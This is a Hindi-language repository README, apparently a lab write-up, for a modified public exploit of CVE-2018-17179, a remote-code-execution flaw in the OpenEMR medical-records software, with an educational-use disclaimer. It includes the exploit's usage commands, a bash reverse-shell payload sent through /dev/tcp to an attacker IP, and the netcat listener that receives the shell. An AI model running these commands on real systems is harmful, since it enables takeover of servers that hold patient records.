
⚠️ अस्वीकरण
यह रिपॉजिटरी केवल शैक्षिक और शोध उद्देश्यों के लिए है।
यहाँ दी गई जानकारी और कोड का उपयोग नियंत्रित वातावरण में किया जा सकता है, जैसे निजी प्रयोगशाला मशीनें।
इस कोड का अनधिकृत उपयोग उन सिस्टमों के विरुद्ध करना जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है।
CVE-2018-17179 OpenEMR को प्रभावित करता है, जो व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स इलेक्ट्रॉनिक मेडिकल रिकॉर्ड और प्रैक्टिस प्रबंधन सॉफ्टवेयर है।
rest_routes.php एंडपॉइंट के प्रमाणीकरण तंत्र में एक दोष प्रमाणित उपयोगकर्ता को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है।
यह वेब सर्वर उपयोगकर्ता के संदर्भ में रिमोट कोड एक्ज़ीक्यूशन (RCE) का कारण बन सकता है।
rest_routes.php के माध्यम से interface/main/main_screen.phpयह रिपॉजिटरी Exploit-DB से सार्वजनिक एक्सप्लॉइट का संशोधित संस्करण प्रदान करती है:
इस अनुकूलित एक्सप्लॉइट में:
एक स्थानीय परीक्षण OpenEMR लॉगिन पैनल को लक्षित किया गया:

उपयोग: python2 exploit.py <target_url> -u -p -c
उदाहरण: python2 exploit.py http:///openemr -u admin -p secretpass -c 'id'
- Make sure you have Python 2 installed.
- The user must have access to the vulnerable `rest_routes.php` endpoint.
एक्सप्लॉइट निष्पादित करें
संशोधित एक्सप्लॉइट स्क्रिप्ट को bash रिवर्स शेल पेलोड के साथ चलाया गया:
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

पोर्ट 4444 पर Netcat लिसनर ने सफलतापूर्वक एक रिवर्स शेल प्राप्त किया:
nc -nvlp 4444

मेरी Medium पोस्ट पर विस्तृत वॉकथ्रू और सिद्धांत देखें:
👉 Medium पर ब्लॉग पढ़ें